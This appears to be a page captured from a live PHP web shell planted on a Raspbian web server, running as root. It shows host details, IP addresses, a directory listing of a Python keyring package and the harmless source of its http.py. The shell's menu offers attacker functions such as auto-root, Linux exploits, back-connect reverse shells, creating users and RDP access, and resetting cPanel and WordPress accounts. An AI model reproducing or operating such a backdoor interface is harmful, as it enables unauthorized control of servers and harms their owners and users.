Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
keyring /
[ HOME SHELL ]
Name
Size
Permission
Action
backends
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
util
[ DIR ]
drwxr-xr-x
__init__.py
277
B
-rw-r--r--
__init__.pyc
494
B
-rw-r--r--
__main__.py
70
B
-rw-r--r--
__main__.pyc
254
B
-rw-r--r--
backend.py
5.93
KB
-rw-r--r--
backend.pyc
8
KB
-rw-r--r--
cli.py
4.13
KB
-rw-r--r--
cli.pyc
4.26
KB
-rw-r--r--
core.py
4.96
KB
-rw-r--r--
core.pyc
6.31
KB
-rw-r--r--
credentials.py
1.34
KB
-rw-r--r--
credentials.pyc
2.93
KB
-rw-r--r--
devpi_client.py
199
B
-rw-r--r--
devpi_client.pyc
506
B
-rw-r--r--
errors.py
1.36
KB
-rw-r--r--
errors.pyc
3.06
KB
-rw-r--r--
http.py
1.24
KB
-rw-r--r--
http.pyc
1.92
KB
-rw-r--r--
py27compat.py
1.06
KB
-rw-r--r--
py27compat.pyc
1.46
KB
-rw-r--r--
py32compat.py
107
B
-rw-r--r--
py32compat.pyc
282
B
-rw-r--r--
py33compat.py
660
B
-rw-r--r--
py33compat.pyc
943
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : http.py
""" urllib2.HTTPPasswordMgr object using the keyring, for use with the urllib2.HTTPBasicAuthHandler. usage: import urllib2 handlers = [urllib2.HTTPBasicAuthHandler(PasswordMgr())] urllib2.install_opener(handlers) urllib2.urlopen(...) This will prompt for a password if one is required and isn't already in the keyring. Then, it adds it to the keyring for subsequent use. """ import getpass from . import get_password, delete_password, set_password __metaclass__ = type class PasswordMgr: def get_username(self, realm, authuri): return getpass.getuser() def add_password(self, realm, authuri, password): user = self.get_username(realm, authuri) set_password(realm, user, password) def find_user_password(self, realm, authuri): user = self.get_username(realm, authuri) password = get_password(realm, user) if password is None: prompt = 'password for %(user)s@%(realm)s for '\ '%(authuri)s: ' % vars() password = getpass.getpass(prompt) set_password(realm, user, password) return user, password def clear_password(self, realm, authuri): user = self.get_username(realm, authuri) delete_password(realm, user)
Close